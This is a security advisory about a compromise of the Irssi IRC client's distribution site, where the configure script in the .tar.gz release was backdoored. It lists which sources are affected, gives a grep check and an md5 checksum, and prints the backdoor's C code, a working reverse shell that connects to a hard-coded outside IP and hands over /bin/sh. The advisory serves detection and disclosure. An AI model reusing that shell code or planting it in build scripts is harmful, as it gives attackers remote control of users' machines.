|
Brought to you by:
Suppliers of:
|
|
|
| |
| The main web site of Irssi distribution has been hacked (the hacking occurrence seemed to have happened over two months ago but has only recently been detected), and the tar ball distribution of the package has been infected with a backdoor. All users of the IRC client should either upgrade, or download the latest version from the web site and confirm the MD5 checksum. |
| |
Credit:
The information has been provided by Martin ?stlund.
|
| |
What did the backdoor do? How to get rid of it?
The backdoored configure script spawns a new shell, connects to some server, and allows full shell access to it. Therefore, it might have done anything.
At least currently, the server where it connects to does not do anything automatically. We would guess that it just waits incoming for commands. As for fixing it, it really depends on what it did, and we do not yet know that. So possibly, it did not do anything, and you do not need to do anything, but possibly it ran a rootkit or whatever and you will need to reinstall your whole system. We would suggest doing that if you have any doubt.
In any case, you should make sure the process is not running anymore by killing all your /bin/sh processes, or by rebooting.
How do I know if I'm affected?
The backdoor was only in "configure" the built binary itself is not backdoored. Here is some ways to figure out if you are affected:
* If you installed Irssi from binary, you are safe.
* Debian sources were not backdoored.
* Nightly source snapshots do not seem to be backdoored.
* CVS does not seem to be backdoored.
* irssi-0.8.4.tar.bz2 file was not backdoored, only the .gz one
* FreeBSD port was not backdoored, as it used the .bz2 file
* Irssi/SILC client was not backdoored
* If you let Irssi download the GLib sources from irssi.org, they are backdoored (the same configure thing as with Irssi)
* If you still have the sources, check with grep SOCK_STREAM configure. If it returns any lines, it is backdoored.
* md5 checksum of originally released irssi-0.8.4.tar.gz is 57bf9d89638be3d377be211f0b0d7049. This is also the one of 0.8.4a.
What exactly was the backdoor?
These lines were found from configure script:
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
{ char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
In addition, the IP just changed yesterday from 209.164.15.215.
|
|
|
|
|
